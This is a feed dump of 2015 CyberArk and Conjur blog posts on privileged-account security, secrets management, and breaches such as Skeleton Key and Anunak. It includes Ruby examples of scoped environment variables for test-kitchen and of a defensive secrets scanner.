Current approaches all have the same problem: they introduce confusion into how your organization handles security. Confusion slows your team down. Slowing your team down makes another team angry because they’re waiting on that update to the platform to deploy their new application. Others are frustrated that we’re all cutting corners with security. Breaking SecDevOps is easy, see?

Here are some of the more popular ways to approach using secrets during development:

1- Write the secrets into the code.

No one disputes that this is bad form, even if your code is in a private repository. There is no separation of duties, access is way over-privileged, and there is no audit of access (although there is audit of updates).

2- Write the secrets to local files ignored by source control.

Looks fine from a source control standpoint, but wait – how do I get the secrets to create this local file, are they stored somewhere for me to retrieve or just in someone’s head? How are secrets being made available to our different environments? What happens when they change, how do I know to get new secrets?

3- Export the secrets as environment variables on the dev machine.

Same problems as #2.

4- Use something like chef-vault or citadel to provide the secrets on converge.

Chef-vault uses a machine’s public keys to grant authorization to a public service. The mechanism for creating those keys, getting them on the machine and retiring them is left up to you. Instead of being able to create a role-based mapping of nodes, you are stuck with passing a list of nodes. Also, now you can only use Chef.

Citadel tackles the problem by using AWS IAM groups. Once you grow your infrastructure to a non-trivial size you end up with a gnarly mess of CloudFormation templates. And unless you develop on an AWS machine, you can’t test locally very easily.

So to recap, the above solutions can be characterized as:

  • Give up on secrets management and just give them to everyone

  • Have a few individuals manage secrets and require devs to request them as needed

  • Force developers to manually manage and exchange the secrets using a non-defined process

  • Lock the system into a single technology (Chef or AWS); and still be without audit capabilities, or ability to support true dev/ci/production workflows.

Reducing confusion and friction to enable speed with security is one of our primary goals at Conjur. To that end, we provide tooling to make development with secrets easier.

Let’s walk through an example of using Conjur in a test-kitchen workflow, injecting secrets into our kitchen.yml at runtime. The code for this example is here: https://github.com/conjurdemos/conjur-kitchen. Follow the README to launch it on your machine.

We are converging the rabbitmq cookbook, injecting the management console’s username and password from Conjur. This is just a standard cookbook setup with one file of note, `.conjurenv`. This file maps secrets stored in Conjur to temporary environment variables or files and allows you to run them in local context. When we run `conjur env run` the variables are pulled from Conjur and exported to environment variables only until the command exits. In this case `RABBITMQ_USERNAME` and `RABBITMQ_PASSWORD` are made available. You can always check if you have access to these secrets by running `conjur env check`.

Now all we have to do is override the Chef attributes in our `kitchen.yml` to point to these environment variables and we are ready to converge. `conjur env run -- kitchen converge` is the command. The instance converges correctly, the tests run and test-kitchen exits. If you now run `echo $RABBITMQ_USERNAME` you get nothing. That environment variable is gone as soon as test-kitchen exits. This part is important – no credentials are left on the developer machine. As a developer I don’t even need to know what the value of the secret is. When someone rotates this secret, it doesn’t hinder my workflow at all.
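To make the workflow above concrete, here is an added example (not code from the conjur-kitchen repository or from Conjur): a `kitchen.yml` whose RabbitMQ attributes are read from environment variables, plus an in-process stand-in for `conjur env run` that exports the variables only for the duration of one block and restores the environment afterward. The secret values, the `rabbitmq` attribute names and the scoping helper are assumptions constructed for this example.

```ruby
require 'erb'
require 'yaml'

# Constructed stand-in for the two secrets the workflow pulls from Conjur.
# In the real workflow `conjur env run` supplies them; these are sample data.
SAMPLE_SECRETS = {
  'RABBITMQ_USERNAME' => 'rabbit-admin',
  'RABBITMQ_PASSWORD' => 'example-not-a-real-secret'
}.freeze

# A kitchen.yml written as the post describes: the credential attributes come
# from environment variables, so the file itself never holds a secret.
# ENV.fetch with no default makes a converge fail immediately when the secrets
# were not injected, instead of silently converging with empty attributes.
# The attribute names are assumptions; check the rabbitmq cookbook you use.
# .inspect double-quotes the value so it stays a valid YAML scalar.
KITCHEN_YML_TEMPLATE = <<~'TEMPLATE'
  ---
  driver:
    name: vagrant
  provisioner:
    name: chef_zero
  platforms:
    - name: ubuntu-14.04
  suites:
    - name: default
      run_list:
        - recipe[rabbitmq::mgmt_console]
      attributes:
        rabbitmq:
          default_user: <%= ENV.fetch('RABBITMQ_USERNAME').inspect %>
          default_pass: <%= ENV.fetch('RABBITMQ_PASSWORD').inspect %>
TEMPLATE

# Render the template the way test-kitchen does (kitchen.yml is ERB).
def render_kitchen_yml(template = KITCHEN_YML_TEMPLATE)
  ERB.new(template).result(binding)
end

# In-process model of `conjur env run -- <command>`: the variables exist only
# while the block runs; afterwards the previous environment is restored, so
# nothing is left behind in the developer's shell even if the block raises.
def with_scoped_env(secrets)
  previous = secrets.keys.each_with_object({}) { |k, h| h[k] = ENV[k] }
  secrets.each { |k, v| ENV[k] = v }
  yield
ensure
  previous.each do |k, v|
    if v.nil?
      ENV.delete(k)
    else
      ENV[k] = v
    end
  end
end

# The workflow from the post: inject secrets, render (stand-in for converge),
# exit with a clean environment. Returns the rendered kitchen.yml.
def converge_with_secrets(secrets = SAMPLE_SECRETS)
  with_scoped_env(secrets) { render_kitchen_yml }
end

# Secret variable names still visible after the scoped run; should be empty.
def leaked_secret_vars(secrets = SAMPLE_SECRETS)
  secrets.keys.select { |k| ENV.key?(k) }
end

if __FILE__ == $PROGRAM_NAME
  puts converge_with_secrets
  puts "secret variables still set after the run: #{leaked_secret_vars.inspect}"
end
```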

This test-kitchen demo is just one example of how Conjur can enhance your existing workflows without sacrificing speed for security. Any tool you use that can accept environment variables as input will work great with Conjur.

Read more about the conjur env command here: http://developer.conjur.net/reference/tools/conjurenv

]]>
DIY Secrets Management is Letting Everyone Down https://www.cyberark.com/blog/diy-secrets-management-is-letting-everyone-down/ Thu, 05 Feb 2015 22:02:00 +0000 https://cyberarkvx2.wpengine.com/blog/diy-secrets-management-is-letting-everyone-down/  

One of the first things I do every morning is read the NYTimes and the WSJ. I can’t help but notice that Cybersecurity and Cybercrime have become very common themes. However, despite all the front page news, there doesn’t seem to be much information that is actually newsworthy on the cybersecurity front. Today’s top story was the Anthem Healthcare breach.  

Kudos to Anthem for getting out in front of this story by making an announcement.  The details are still unfolding but clearly data was stolen from the systems, and assuming the data was encrypted according to HIPAA requirements, database encryption keys must have been stolen too if the data were to be useful to the thieves.


If we want to stop this from happening, IT organizations need to code their way out of the problem. Automation and security policies as code are the way forward, so that the standardization and reproducibility of secrets management permeates the organization consistently. Why is code the answer? It can be 1) inspected, 2) tracked, and 3) verified. Everything else is duct tape and baling wire.

But this is like any burndown or behavioral change — elimination of security debt around secrets management must begin with a step in the right direction.  Are you using a privileged password right now?

Make it a game to start getting IT creds off disk, out of backups, and out of source control and config files.  Set up a bounty for your system admins to get these creds out of sight, anywhere and everywhere – it will cost less in time, money, and lost consumer faith in the end compared to credit card monitoring for thousands or millions of people!

Step 1: Get passwords off of wikis and out of shared repositories like source control

Step 2: Identify the high-value master keys. Control them and rotate them as frequently as you can; that means don’t hardcode them anywhere.

This is a solved problem, don’t let it sit on the IT to-do list for another year.  There are better practices and good tools that can be adopted that won’t hinder what you want your organization to be able to do from a functional perspective. These functional practices still get these credentials out of the hands of those who shouldn’t have them.  You don’t need to build something, you just need to deploy one of the many products that provide controlled access to secrets and system credentials and stop inventing your own.

Even if you don’t use Conjur to fix this problem, please fix it.  Take control of this issue before your company is the next lead article in The New York Times and The Wall Street Journal.   


]]>
“Skeleton Key” Malware: A Case for Protecting Privileged Accounts https://www.cyberark.com/blog/skeleton-key-malware-case-protecting-privileged-accounts/ Thu, 05 Feb 2015 13:40:51 +0000 https://www.cyberark.com/blog//

In early 2014, a global organization headquartered in London discovered a terrifying new piece of malware in its IT systems, dubbed the “Skeleton Key” for its ability to “unlock” and provide privileged access to virtually every single employee account within an enterprise. The powerful malware strain allows cybercriminals to bypass Active Directory (AD) systems that implement only single-factor authentication – or, in other words, systems that rely on passwords alone for security.

A post-mortem of the first reported Skeleton Key cyber attack reveals the attackers resided in the network, without detection, for more than two years in an ongoing cyber espionage operation. Already on the company’s network via a remote access Trojan (RAT), the attackers stole legitimate credentials that gave them full, unfettered access. Then, by deploying the Skeleton Key malware, they were able to remotely carry out the rest of their attack.

The Skeleton Key purposely lacks persistence. The malware must be redeployed when a domain controller is rebooted. This intentional lack of persistence most likely indicates the stealthy nature of this particular operation. If it was made persistent over a reboot, the malware would leave behind a footprint, increasing the chance of detection. The hackers were clearly out for specific information and chose to maintain a low profile to evade discovery in order to obtain it.

Researchers believe the attackers have used Skeleton Key on other enterprises. One of the biggest indicators for this is the distinctive password structure used by the attackers when choosing logins for targeted systems. Passcodes would include the name of the organization’s Active Directory domain, followed by an “@” symbol and a code name for the company. This would not be necessary if only one single victim had been targeted.

The Skeleton Key has created waves in recent weeks since any organization using Active Directory could be a potential target. However, it’s important to remember that in order for attackers to utilize Skeleton Key and install malware on a domain controller, they first have to compromise the domain administrative credentials. If your organization has controls in place that isolate, monitor and control privileged account sessions, or utilize one-time passwords, attackers will not be able to take control of these admin credentials – which in turn prevents them from deploying Skeleton Key. Even if attackers are somehow able to circumvent all of those controls and utilize the malware, deployed behavioral analytics tools that detect anomalous user behavior will help to quickly identify and alert on a similar attack.

As frightening as the Skeleton Key may seem, we would argue that it once again comes down to protecting privileged credentials. If attackers are not able to exploit these credentials in the first place, they will be unsuccessful in deploying Skeleton Key malware in your network environment.

To learn more about how to get started on securing privileged accounts and credentials, check out the CyberArk Privileged Account Security Solution.

]]>
The Privilege Escalation Cycle and Its Role in Russia’s Anunak Cyber Attack https://www.cyberark.com/blog/privilege-escalation-cycle-role-russias-anunak-cyber-attack/ Tue, 03 Feb 2015 15:26:44 +0000 https://www.cyberark.com/blog//

Researchers from Russian cyber investigations firm Group-IB and Dutch security firm Fox-IT recently published a joint report detailing the activities of Anunak, the Russian hacker group who is said to have brought about the “armageddon” of the Russian banking industry. Named after the primary malware program in its arsenal, Anunak has been linked to numerous cyber attacks on U.S. and European retailers. While the group carried out attacks in multiple verticals, including media groups, government agencies and retail, its most lucrative operation has focused on Russia’s finance industry.

Unlike most attackers who target the customers of banks and financial institutions, Anunak targets the institutions themselves. Since 2013, Anunak has successfully infiltrated 50 Russian banks and five payment systems. After making their way inside these organizations, the hackers exploited privileged accounts in order to compromise internal networks, workstations and servers. This access allowed them to transfer funds to accounts under their control and even infiltrate 52 separate ATM systems and make off with the cash. In some cases, the damage has been so severe that financial institutions have lost their banking licenses altogether. The report estimates Anunak has stolen as much as $18 million (or 1 billion rubles) – making off with roughly $2 million per breach. The group has also ventured beyond financially motivated attacks, compromising media groups and other organizations in search of intellectual property (and likely a trading advantage in the stock market). In cases where the group gained access to government agency networks, their aim was espionage.

This criminal enterprise is still very much alive, posing a threat to enterprises worldwide. So how can you protect your organization against such cyber threats when so many others before you have failed and suffered catastrophic damage as a result?

The first step requires a mindset shift. No matter what, motivated attackers will find a way to get in. And as phishing methods (such as those employed by Anunak) become increasingly sophisticated, employees increasingly become a highly likely point of infiltration. Once inside, attackers focus on hijacking and exploiting unprotected privileged accounts and credentials (such as a systems administrator’s credentials, for example), enabling them to move laterally across the network, gain access to critical systems and exfiltrate stolen data. According to CyberArk’s recently published Cyber Threat Report, over 80 percent of all serious security incidents included a compromise and misuse of privileged accounts at some point in the attack process.

If the Anunak attacks teach us anything, it’s that while cyber attackers may have different motives or end goals, their pathways are usually the same: commandeer privileged accounts, escalate access to move across the network and steal critical data and assets without detection. This privileged escalation cycle is something we see time and time again, and organizations need to be prepared to protect against it. By implementing the necessary tools and infrastructure to manage, continuously monitor and track privileged account activity, along with the analytics and intelligence to identify anomalous activity, organizations can protect themselves and enable a quick response, making it possible to mitigate potential damage early in the attack cycle.

Learn more about privileged account exploits and read first-hand accounts from some of the world’s top cyber forensics and incident response professionals in our Cyber Threat Report.

]]>
U.S. Military Twitter Account Hacked by Islamic State Sympathizers https://www.cyberark.com/blog/u-s-military-twitter-account-hacked-islamic-state-sympathizers/ Thu, 29 Jan 2015 16:49:02 +0000 https://www.cyberark.com/blog//

Hackers claiming allegiance to the Islamic State hijacked the Twitter and YouTube accounts of the U.S. military’s Central Command, reported The Washington Post. These account takeovers – which included the publication of a series of posts containing threatening messages, propaganda videos and military documents – are reminiscent of other social media attacks, such as those performed by the Syrian Electronic Army against the Associated Press and FIFA World Cup’s Twitter accounts.

The proliferation of social media channels and associated accounts presents a serious security threat to government and enterprise organizations alike. A recent industry study of Fortune 100 firms reveals three major issues related to social media plaguing large organizations today: unauthorized accounts, content threats and account attacks.

Most companies maintain numerous social media accounts on Twitter, Facebook, YouTube and LinkedIn, often with unique accounts for different product lines, languages, countries and stakeholders. Passwords for these accounts are often shared amongst teams. In some cases, they’re even managed by third parties. Making matters worse, the same password is frequently used across multiple accounts, and passwords are rarely changed. As a result, social media accounts are becoming easy targets for increasingly sophisticated cyber attackers due to the lack of tracking, record-keeping or accountability for each individual post.

We’ve seen just how quickly social media can tear down a brand or organization at the hands of hackers or malicious insiders. Account takeovers, such as the one reported this week, can lead to the unauthorized publishing of confidential information such as intellectual property, to legal, regulatory and compliance violations, and to disclosure of personal data and identity theft. The result can be severely compromised brand reputations and significant financial loss. With more frequent attacks of this nature, it’s time for organizations to take a closer look at how they manage their social media accounts – and start treating them like the privileged accounts they truly are. The following best practices for privileged account security should be employed to mitigate social media security risks:

  • Enable transparent access.
  • Eliminate shared credentials.
  • Automate and enforce password changes.
  • Trace account activity.
  • Record social media administrator sessions.

As evidenced this week, the threat is real. Now is the time to ensure your social media accounts are not an easy target. To learn more about social media and the shared privileged account, download this free whitepaper.

]]>
4 Lessons I Learned Trying to Build a Secrets Scanner https://www.cyberark.com/blog/4-lessons-i-learned-trying-to-build-a-secrets-scanner/ Thu, 29 Jan 2015 20:20:00 +0000 https://cyberarkvx2.wpengine.com/blog/4-lessons-i-learned-trying-to-build-a-secrets-scanner/

Do you know where all the secrets are on all the systems and code you administer? Are all of your private encryption keys, API keys, and passwords secure, or have some of them slipped into public repos, or globally readable directories? Are you sure?

I worked on trying to build a secrets scanner: software to find private keys, API keys, or passwords. How? Keys can often be identified by file extension or by the head of the file. The other secrets are, most of the time, generated automatically and look like ‘random’ values. So if we eliminate anything with a pattern, what is left are the secrets. Sounds simple, right?

I created a multiple-pass system. There is a special-purpose initial pass which looks for files like “NAME.pub” so that it can flag “NAME” as a possible private key file in its second pass. After that it looks for files of interest (key files, configuration files, or code files) by extension; it then examines the identified files in greater detail according to their type.

The current code is still very preliminary, and results vary greatly, but as an example, on my personal machine with about 45GB mounted in almost 400,000 files on an HDD, the whole system scan took about 22 minutes and ultimately flagged 1,171 files, after examining 28,434 files selected by extension. Currently, most of what it flags is actually false positives, in part because, although the false positive rate is low, there are very few files with real secrets on my machine. Additionally, source code other than Ruby is not being truly parsed, so there are cases where it misses a true result or incorrectly flags a benign result that it could judge correctly with proper parsing.

Lesson #1

There are a lot of keys and source code files on a machine. I was surprised at just how many keys there were. LibreOffice alone had more than 30 keys. Now, these could be excluded very simply by checking for public keys versus private keys, which is not yet done, but it illustrates some of the volume I found. Similarly, I was not expecting the thousands of source files from all sorts of applications, although it is logical in hindsight given the interpreted languages they are using.

There are a few obvious ways to reduce the problem. We can search only in a targeted location, do a base scan, and subsequently only consider modified files, or even better, work intelligently with diffs. Thus whatever false positives may remain need not be reviewed more than once.

Lesson #2

Use a language parsing library to extract strings from source code. Figuring out what is a string and what isn’t seems like a simple problem, but it’s actually non-trivial. If you start by trying to solve it with regexes, you will eventually find that a parser is needed anyhow. In my code, only a Ruby parser has been added so far, but the other languages will need to be parsed as well to achieve accurate results.

Lesson #3

The most intractable problem for the software is separating the hard false positives. For instance, cryptographic values, like a hash, will also appear random. When these values are embedded in a source file, they trigger my detector. In general, cryptographic values and machine generated secrets are hard to distinguish by software because they can come from the same sample space.

Lesson #4

Ultimately, we must call in a human. But even if many of the strings or files identified are false positives, the area which needs human review is greatly reduced. Not only that, but the false positives, which are difficult for the software to recognize, are often very obvious to the human reviewer. If this is combined with an efficient UI for review, the software and human reviewer team can be far more effective than either one on its own.
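
The multi-pass design and Lessons #2 and #3, as an added example that is not the author’s scanner: it walks a constructed in-memory file tree, uses the “NAME.pub” sibling hint and the PEM header to find key files, pulls string literals out of Ruby source with the stdlib Ripper lexer instead of regexes, and separates fixed-length hex digests (which merely look random) from high-entropy secret candidates. Every path, file content and threshold below is made up for the example.

```ruby
# Added example, not the original post's code: a small multi-pass secrets scanner.
require 'ripper'

KEY_EXTENSIONS    = %w[.pem .key .p12 .pfx].freeze
SOURCE_EXTENSIONS = %w[.rb].freeze      # only Ruby is parsed, as in the post
MIN_SECRET_LENGTH = 20                  # assumed threshold for this example
ENTROPY_THRESHOLD = 4.0                 # bits/char; 32 distinct chars score 5.0

# Shannon entropy of a string in bits per character.
def shannon_entropy(str)
  return 0.0 if str.empty?
  counts = Hash.new(0)
  str.each_char { |ch| counts[ch] += 1 }
  len = str.length.to_f
  total = counts.values.sum { |c| prob = c / len; prob * Math.log2(prob) }
  -total
end

# Pass 1: a "NAME.pub" file suggests a sibling "NAME" that may be a private key.
def private_key_candidates_from_pub(paths)
  paths.select { |p| p.end_with?('.pub') }.map { |p| p.delete_suffix('.pub') }
end

# Pass 2: select files worth a closer look by extension, plus the pass-1 hints.
def files_of_interest(paths)
  hinted = private_key_candidates_from_pub(paths)
  paths.select do |p|
    ext = File.extname(p)
    KEY_EXTENSIONS.include?(ext) || SOURCE_EXTENSIONS.include?(ext) || hinted.include?(p)
  end
end

# Pass 3a: key files are recognised by the head of the file (PEM armor line).
def pem_private_key?(content)
  head = content.lines.first.to_s
  head.start_with?('-----BEGIN') && head.include?('PRIVATE KEY')
end

# Pass 3b (Lesson #2): use a real lexer, not regexes, to get string literal contents.
def ruby_string_literals(source)
  Ripper.lex(source).select { |tok| tok[1] == :on_tstring_content }.map { |tok| tok[2] }
end

# Classify one literal: :secret_candidate, :likely_digest (a hash that only looks
# random, Lesson #3, left for the human reviewer), or nil for benign text.
def classify_literal(str)
  return nil if str.length < MIN_SECRET_LENGTH || str.match?(/\s/)
  return :likely_digest if str.match?(/\A\h{32}\z|\A\h{40}\z|\A\h{64}\z|\A\h{128}\z/)
  shannon_entropy(str) >= ENTROPY_THRESHOLD ? :secret_candidate : nil
end

# Whole pipeline over an in-memory tree {path => content}; returns {path => [[kind, value], ...]}.
def scan_tree(files)
  findings = {}
  files_of_interest(files.keys).each do |path|
    content = files[path]
    if pem_private_key?(content)
      findings[path] = [[:private_key, content.lines.first.chomp]]
    elsif SOURCE_EXTENSIONS.include?(File.extname(path))
      hits = ruby_string_literals(content).map { |lit| [classify_literal(lit), lit] }
                                         .reject { |kind, _| kind.nil? }
      findings[path] = hits unless hits.empty?
    end
  end
  findings
end

# Constructed sample tree; none of these values are real keys or secrets.
SAMPLE_TREE = {
  'home/dev/.ssh/id_demo.pub' => 'ssh-rsa AAAAB3NzaC1yc2E... constructed public key',
  'home/dev/.ssh/id_demo'     => "-----BEGIN OPENSSH PRIVATE KEY-----\nCONSTRUCTED-NOT-A-REAL-KEY\n-----END OPENSSH PRIVATE KEY-----\n",
  'app/config/settings.rb'    => <<~'RUBY',
    API_TOKEN     = "q7Lm2ZpX9vRt4YwB8nKd0HsA3fGj6cVe"   # constructed; looks machine-generated
    PINNED_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
    GREETING      = "Please enter your password and try again"
  RUBY
  'app/README.md'             => 'Nothing to see here.'
}.freeze

if $PROGRAM_NAME == __FILE__
  scan_tree(SAMPLE_TREE).each do |path, hits|
    hits.each { |kind, value| puts "#{path}: #{kind} #{value[0, 24]}..." }
  end
end
```

The digest is reported separately rather than dropped, which is the point of Lesson #4: the software narrows the review set, and the reviewer decides.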

]]>
ISO 27002 and Safeguarding Privileged Access https://www.cyberark.com/blog/iso-27002-safeguarding-privileged-access/ Wed, 28 Jan 2015 15:12:30 +0000 https://www.cyberark.com/blog//

The International Organization for Standardization (ISO) has published an updated ISO/IEC 27002 standard that organizations the world over should follow as a basic, best practice for security. ISO/IEC 27002 is important because it provides an international framework that auditors rely on for verification of compliance with security mandates, and if the recent string of high-profile breaches in the past 12 months has taught us one thing, it’s that best practices are still not being followed when it comes to general security considerations.

There’s a lot of good information in the updated standard and one key addition centers on privileged account management. The paper is dense with content – your typical standards framework – so we wrote a new white paper, “Safeguarding Privileged Access: Implementing ISO/IEC 27002 Security Controls with the CyberArk Solution,” that lays out a blueprint for implementing the CyberArk Privileged Account Security Solution to enforce controls pertaining to privileged access within the standard.

We all know that true security goes well beyond compliance; however, many organizations use the ISO/IEC standard as a starting point for their information security program. For large global enterprises that operate in multiple countries, it can be useful as a general controls framework to help achieve compliance with many country-specific regulations. For small-to-medium sized companies, it can be an effective tool in establishing more mature information security controls.

The recommendations stress the importance of managing privileged access rights in order to protect information. As our recent threat report showed, this is critical to thwarting advanced attacks. For example, in cases of termination or resignation, disgruntled employees or contractors can use their privileged access rights to deliberately corrupt or sabotage information, and/or be tempted to collect information for future use.

There are controls related to securing privileged accounts throughout the ISO/IEC 27002:2013 standard, including requirements for:

  • Establishing and implementing privileged access policy
  • Identifying the privileged access rights associated with each system or process
  • Restricting the use of privileged access to authorized users based on functional roles
  • Authenticating privileged users, ensuring individual accountability for privileged actions
  • Changing default vendor passwords
  • Restricting access to privileged utility programs
  • Controlling privileged access by suppliers
  • Logging and monitoring privileged access

If you’d like to learn more about the new standard, have a read through our paper, or listen to a recent webinar, outlining how to best protect privileged accounts to address the new controls.

]]>
FIDO Alliance Specifications Miss the ‘Keys to the IT Kingdom’: Privileged Accounts https://www.cyberark.com/blog/fido-alliance-specifications-miss-keys-kingdom-privileged-accounts/ Thu, 22 Jan 2015 14:34:07 +0000 https://www.cyberark.com/blog//

There’s been a lot of news about the recent FIDO (Fast Identity Online) Alliance announcement signaling the death of passwords and a boon for stemming the rash of massive data breaches. Will it really? While a great step forward, it completely misses that there’s a massive difference between consumer passwords and privileged account passwords or credentials, and how to weigh the value of protecting each.

The simple fact is that attackers covet privileged access (you can read a quick post on why here). Privileged accounts are exploited in almost every targeted cyber attack. Threat investigators say that between 80-100 percent of all serious security incidents they’ve investigated featured the “signature” of compromised and exploited privileged accounts in the attack process. For some reason, FIDO completely omits this in their work …

So what is FIDO doing? Backed by industry heavyweights including Microsoft, Google, PayPal, Bank of America and MasterCard, FIDO issued the first fully completed drafts of two specifications – the Universal Authentication Framework (UAF) and Universal 2nd Factor (U2F) – aimed at building a foundation for secure online communications without using passwords. In the world of safe online consumer passwords, these specifications are a great step forward.

However, as an industry we need a clear delineation between personal passwords and those tied to organizational assets. While it is reasonable to allow users to manage their own personal credentials, no employee or contractor should ever be put into the position to create, manage or change passwords for privileged accounts. Password reuse, template-based passwords susceptible to brute force, and many other vulnerabilities all arise from policies that allow employees to manage these critical asset passwords. These need to be managed by the organization and handled in a completely different manner than personal passwords.

Will FIDO be a boon for stemming the rash of massive data breaches? No. Until the ‘privileged account problem’ is solved, breaches will continue.

Organizations need a better solution to protect key passwords – such as those for privileged accounts that control access to their most sensitive assets. An automated password management tool is essential for making privileged account credentials as secure as possible. Once deployed, the level of complexity and randomness of managed passwords becomes much higher than if left to individual choice, while eliminating the memory problem. This also makes it possible to protect the passwords from malware that collects passwords through key logging, screen-capture and other means of intercepting passwords.

For a much more in-depth view of what it takes to solve the privileged account problem, check out our solution.

]]>
Attack Origin: Does it Even Matter https://www.cyberark.com/blog/attack-origin-even-matter/ Tue, 20 Jan 2015 15:42:56 +0000 https://www.cyberark.com/blog//

It’s been an exciting month keeping up with the latest cyber security breach! If you aren’t caught up, listen to this great recap by NPR. And CyberArk founder and CEO, Udi Mokady, joined CNBC’s Squawk Box to point out that the most important lesson from the Sony breach is that protecting the inside is what really matters. The news cycle is focused on who perpetrated the attack and what the US government might do in reaction; however, this doesn’t help companies become more secure.

As we learn from this and other recent attacks (on entertainment, financial, retail and other industries) it has become next to impossible for an organization to know why and by whom it may be attacked. Is it a criminal gang looking for financial gains or a nation state looking for a political gain?  Or is it an adversary looking to use the organization as a stepping stone for an attack on a partner or another connected organization? An activist looking to discredit an organization?

Who’s responsible for an attack has become more difficult to pinpoint as tools and techniques are widely distributed, shared, studied, used and reused. Organizations no longer know who the attackers are or why they are attacked. Will it be the content of a movie or a comment from an executive that sets off a nightmare situation for a company?

Thus, the security of the organization must focus on the inside. All targeted attacks make use of the same techniques to operate inside the network. Hijack credentials, gain control of privileged accounts and use them to move around, undetected, throughout the organization – this is at the heart of every attack. If you don’t secure your privileged accounts, you become a sitting duck just waiting for the next adversary who decides to make an example of you…

Companies must take recent lessons to heart or face the consequences.

Not Who….How:  From a security perspective, the Sony attack is a clear demonstration that it no longer matters WHO is attacking an organization, but HOW they did it.  The lesson from this breach is more about the low-level security practices employed by companies and how this has created a frightening new reality in which attackers are able to commandeer and control a company’s infrastructure – no matter where the attack originates.

Sony is Snowden…Snowden is Sony:  At its core, the Sony breach is very similar to other massive attacks/breaches – including the retail breaches that dominated headlines in 2014 and even Edward Snowden and the NSA.  While the outcomes were different, each of these attacks required the theft and exploitation of administrative and privileged credentials, giving the attackers full control of the targeted company’s infrastructure.

Motivations are Meaningless: The line between nation-states and criminal gangs is increasingly blurred. The attacks once limited to nation-funded groups are now widely re-used. FinFisher, Gamma, and Hacking Team are examples of commercial, “for sale” targeted attack capabilities used by nation states. But ultimately, the motivation is meaningless. Today, it was a movie that was the reason. (Or was it?) Is tomorrow’s attack because of a newspaper article? It doesn’t matter. What matters is how the attacks are carried out. This is the key to stopping them.

Why Every Organization is Vulnerable: We conducted an analysis of recent major attacks with forensics experts from companies including Mandiant, Deloitte, Verizon and others that showed cyber-attackers have broadened their targets, pursuing companies of all sizes, in all industries. Why? Every company is connected to other companies by both general business and even IT systems themselves (think of the supply chain in any industry). One company might simply be a doorway into another. As more businesses fall victim to devastating attacks, the more they need security that focuses on securing the inside of the network. It’s time to focus on what can have a positive impact on security and spend less energy trying to uncover where the attack may have originated.

]]>
3 Ways to Integrate Security and DevOps: SecDevOps https://www.cyberark.com/blog/3-ways-to-integrate-security-and-devops-secdevops/ Tue, 20 Jan 2015 15:33:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-ways-to-integrate-security-and-devops-secdevops/

In our last blog post we examined the overall state of DevOps. In today’s post we are going to focus more narrowly on how you can include Security in your already well-firing DevOps process.

With DevOps firmly entrenched in most SaaS and non-SaaS software development organizations these days, one might be asking oneself what’s next? As some smart people have already alluded to, with increased internal and external threats to your infrastructure, the next step in the evolution of DevOps is the addition of Security to the process.

Up until this point Security has been an outsider in the sometimes blissful relationship between Development and Operations. When things are going well you might ask yourself whether you should add security on top of each deployment or whether you should have security rules and regulations in place before any development begins. Remember, the whole point of DevOps is to speed up our ability to ship products and gather feedback. Because of this, the security element can sometimes be viewed as a bottleneck to the process.

So how does one go about integrating Security with their already established DevOps process, or create a brand new process altogether? Here are 3 places to start that will increase your chances of succeeding in not only speeding up your development, but doing it in a way that protects your organization from internal and external threats:

1) Hiring the right team members

Who owns your DevOps process? Hopefully all Developers and Operations folks share in the responsibility, but do you now want to train them on Security? I am sure the answer is no, so ideally you are able to hire Security experts who also have some DevOps chops. Namely, they would be able to identify and submit bug reports with the potential of fixing them as well. With these added skills the hope is that the DevOps process does not slow down; instead it remains efficient but has an added layer of security that wasn’t in place before.

If your Security team simply doesn’t have the dev chops to positively contribute to the process, then you need to hire and position these Security team members as Experts and Advisors for the rest of the team. This means that they should be involved in each stage of the development process, but instead of writing the code they can benefit from the open and agile communication that will let them advise DevOps team members on whether they are squared away from a security perspective prior to deploying any code.


2) Company Culture

With DevOps it is easy to get lost in Automation and forget that this process needs to be driven by the right people. As we looked at in the first part, hiring the right team members is crucial. The reality is that hiring alone isn’t going to solve for SecDevOps. Most likely your DevOps process is structured around your organization’s overall business goals and collaboration. We would argue that one of the subsets of those business goals should include your organization’s overall culture. Culture is always difficult to define; it becomes a bit easier with DevOps in place, but how does Security fit into the mix? Do you already practice Scrum, SAFe, or DAD? If so, these bedrock principles of DevOps can lend themselves nicely to integrating an element of Security into the mix. Again, we don’t want to reinvent the wheel or disrupt an already well performing process; instead we want an element of inclusion with security that will enable products to be shipped even quicker with a hat tip towards security along the way.

With the very basis of DevOps aligning with collaboration it is important to take a step back and assess what type of information is actually being shared. Without SecDevOps in place most likely not a lot of security checks/best practices/information is being exchanged during the feedback loop. The absence of this input naturally opens up your organization to internal and external threats. By including Security as an integral part of your Corporate Culture you will find the information shared internally will naturally factor in Security as a crucial component of building products and gathering customer feedback.

3) Daily Augmentation

So far we have covered how your Hiring Process and Corporate Culture will factor into aligning Security and DevOps. The final factor to take into consideration is Augmentation. Fundamentally a pillar of the DevOps cultural movement, augmentation is the ability to increase the impact that DevOps has on your organization as a whole with each iteration. Your ability as a Technical Manager or Technical Practitioner to make a positive contribution to your organization’s overall success as it relates to Security is to make sure that a Security Expert is involved in every stage of your DevOps process.

Whether it be in Planning, Testing, Deployment, Monitoring or Feedback, your job is to make sure an element of security weighs in at each stage. It isn’t enough to have a ‘Security Review’ at the end of each sprint; instead, Security considerations need to augment, or improve, the already existing agile environment that is enabling your business to reach its goals.

Obviously there are numerous other variables at play in this SecDevOps equation but we hope these points will act as building blocks for you to leverage when installing a similar process at your organization. As with any good DevOps initiative, the goal isn’t to get it 100% right the first time, but instead learn from each iteration and gradually improve how your teams collaborate, make decisions, and solve for the business.

]]>
2015 View of DevOps and Cloud https://www.cyberark.com/blog/2015-view-of-devops-and-cloud/ Mon, 12 Jan 2015 18:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/2015-view-of-devops-and-cloud/

2015 is unfurling with the same sound and fury that we saw in 2014: cloud adoption continuing to grow, significant initiatives around innovation and speed to deploy are underway across the technology industry, and the DevOps community is still the rock around which the tempest of security and innovation combine.

Over the course of the next three blog posts, we’re going to take a look at the state of DevOps and cloud, focusing in on some of the areas of interest that we hear and see with increasing frequency. We’ll consider where things stand, where they’re headed, and what it means — and what you can do to make this the year that your DevOps projects and programs stay on track.

The State of DevOps

